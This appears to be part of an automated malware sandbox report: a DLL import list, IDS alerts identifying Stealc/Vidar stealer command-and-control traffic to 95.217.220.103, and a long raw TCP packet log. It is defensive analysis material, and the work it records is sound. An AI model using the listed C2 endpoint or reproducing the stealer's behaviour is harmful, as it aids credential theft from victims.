                                                                                                                                                                                                            gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipCreateBitmapFromHBITMAP, GdipCreateBitmapFromScan0, GdipSaveImageToFile, GdipDisposeImage, GdipCloneImage, GdiplusShutdown, GdiplusStartup, GdipFree, GdipAlloc
                                                                                                                                                                                                            OLEACC.dllAccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
                                                                                                                                                                                                            IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                                                                                                                                                            WINMM.dllPlaySoundA
                                                                                                                                                                                                            oledlg.dll
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-23T07:03:10.116209+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49989 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:11.614777+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49990 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:13.666136+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49991 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:15.274549+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49992 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:15.971660+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 95.217.220.103 | 443 | 192.168.2.6 | 49992 | TCP
2024-10-23T07:03:16.883942+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49993 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:17.565183+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.6 | 49993 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:17.565702+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 95.217.220.103 | 443 | 192.168.2.6 | 49993 | TCP
2024-10-23T07:03:18.571787+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49994 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:19.790589+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49995 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:26.679279+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 49997 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:40.979719+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50000 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:43.236395+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50001 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:45.076079+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50002 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:47.374464+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50003 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:49.523853+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50004 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:51.569193+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50005 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:53.515354+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50006 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:55.459525+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50007 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:58.412343+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50008 | 95.217.220.103 | 443 | TCP
2024-10-23T07:03:59.700362+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50009 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:01.246503+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50010 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:02.819275+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50011 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:04.926276+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50012 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:07.550843+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50013 | 95.217.220.103 | 443 | TCP
2024-10-23T07:04:09.179772+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.6 | 50014 | 95.217.220.103 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815677881 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818907022 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818947077 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818978071 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818984985 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.819020987 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935468912 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935523033 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935568094 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935600996 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935620070 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935641050 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935678005 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936047077 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936055899 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936065912 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.962914944 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.962987900 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963069916 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963918924 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963978052 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.116050959 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.116209030 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124449015 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124500990 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124887943 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124948025 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.125286102 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.167356968 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717686892 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717880011 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717924118 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717952967 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.720959902 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.721000910 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748274088 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748308897 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748384953 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748598099 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748601913 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.614679098 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.614777088 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.615236044 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.615252972 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.616914034 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.616928101 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752507925 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752612114 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752615929 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.752684116 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.753978014 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.753998041 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770453930 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770499945 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.770576954 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.782195091 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:12.782208920 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666044950 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666136026 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666763067 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.666776896 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.668656111 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:13.668663025 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352518082 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352576971 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352724075 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352744102 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352744102 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352786064 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352883101 CEST49991443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.352909088 CEST4434999195.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362646103 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362679005 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362763882 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.362988949 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:14.363003016 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.274403095 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.274549007 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.275149107 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.275157928 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.282877922 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.282901049 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971425056 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971457005 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971513987 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971528053 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971539974 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971554995 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.971590042 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.972043037 CEST49992443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.972054958 CEST4434999295.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983556032 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983593941 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983654976 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983896017 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:15.983906031 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.883769989 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.883941889 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.884310961 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.884320021 CEST4434999395.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:16.885884047 CEST49993443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.850769043 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878071070 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878123045 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878195047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878195047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878207922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.878254890 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973438978 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973491907 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973566055 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973603010 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973623037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:21.973644972 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087841034 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087898970 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.087991953 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088009119 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088051081 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.088074923 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115118027 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115173101 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115221024 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115236044 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115258932 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.115281105 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207248926 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207338095 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207355022 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207387924 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207417011 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.207429886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234463930 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234540939 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234616995 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234636068 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234667063 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.234683037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326524973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326582909 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326647997 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326670885 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326700926 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.326744080 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353249073 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353298903 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353349924 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353365898 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353391886 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.353409052 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446222067 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446264029 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446325064 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446336031 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446361065 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.446382046 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472875118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472898960 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472980022 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.472989082 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.473022938 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564209938 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564284086 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564321995 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564332962 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.564376116 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568053007 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568098068 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568131924 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568140030 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568162918 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.568180084 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682794094 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682821989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682914972 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682925940 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.682965040 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684899092 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684920073 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684973001 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.684981108 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.685017109 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752334118 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752398014 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752438068 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752449036 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.752487898 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803355932 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803421021 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803442001 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803453922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803471088 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.803493977 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829169989 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829216003 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829241037 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829248905 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829267979 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.829289913 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922741890 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922790051 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:22.922826052 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.781637907 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879427910 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879472971 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879523039 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879544973 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879564047 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.879580975 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881046057 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881087065 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881114006 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881122112 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881138086 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.881161928 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883368969 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883411884 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883440018 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883447886 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883460999 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.883482933 CEST49995443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901346922 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901388884 CEST4434999595.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:23.901460886 CEST49995443192.168.2.695.217.220.103
